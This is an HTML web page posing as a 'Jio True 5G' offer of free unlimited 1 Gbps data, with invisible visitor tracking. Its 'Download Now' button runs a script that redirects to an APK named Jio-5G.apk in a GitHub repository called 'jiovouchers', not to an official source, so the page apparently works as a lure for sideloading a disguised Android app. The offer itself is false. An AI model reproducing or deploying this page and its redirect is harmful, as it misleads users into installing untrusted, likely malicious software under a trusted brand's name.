<script type="text/javascript">
var sc_project=12778684; 
var sc_invisible=1; 
var sc_security="9c087770"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img
class="statcounter"
src="https://c.statcounter.com/12778684/0/9c087770/1/"
alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>

<html>
    
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<head>
    <Title>Download</Title>
    <style>
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #032876;
        }

.dabavanu {
	background-color:#385bd0;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #032876;
}
.newbutton {
	background:linear-gradient(to bottom, #385bd0 5%, #385bd0 100%);
	background-color:#385bd0;
	border-radius:42px;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:18px;
	padding:16px 55px;
	text-decoration:none;
	text-shadow:0px 1px 0px #3c5fd0;
}
.newbutton:hover {
	background:linear-gradient(to bottom, #2A51CD 5%, #2A51CD 100%);
	background-color:#2A51CD;
}
.newbutton:active {
	position:relative;
	top:1px;

	h2{font color="white"}
	h3{font color="white"}

    </style>

</head>
<script>
function dbvao() 
{
    var m = new Date().getMinutes(); 
	if(m%2==0)
	{
		window.location="https://github.com/jiovouchers/10gb/raw/main/Jio-5G.apk"; 
	}
	else
	{
		window.location="https://github.com/jiovouchers/10gb/raw/main/Jio-5G.apk";
	}
}
</script>
<body>
<center>
    <div>
    
        <img src="https://i.postimg.cc/fbPSMF06/true5g.jpg"  height="100"/><br><br>
    
        <i></i><b></b><h2 style="color:white">Jio True 5G</h2><h3 style="color: white;">
        Jio has rolled out True 5G Network<br>
        Get FREE UNLIMITED Data at 1GBPS speed<br>
Register for Welcome Offer now<br><br>
Offer available on New Jio app.</h3></b></i>
        <div onclick="dbvao()"  class="newbutton">Download Now</a>


    </div>
</center>
</html>
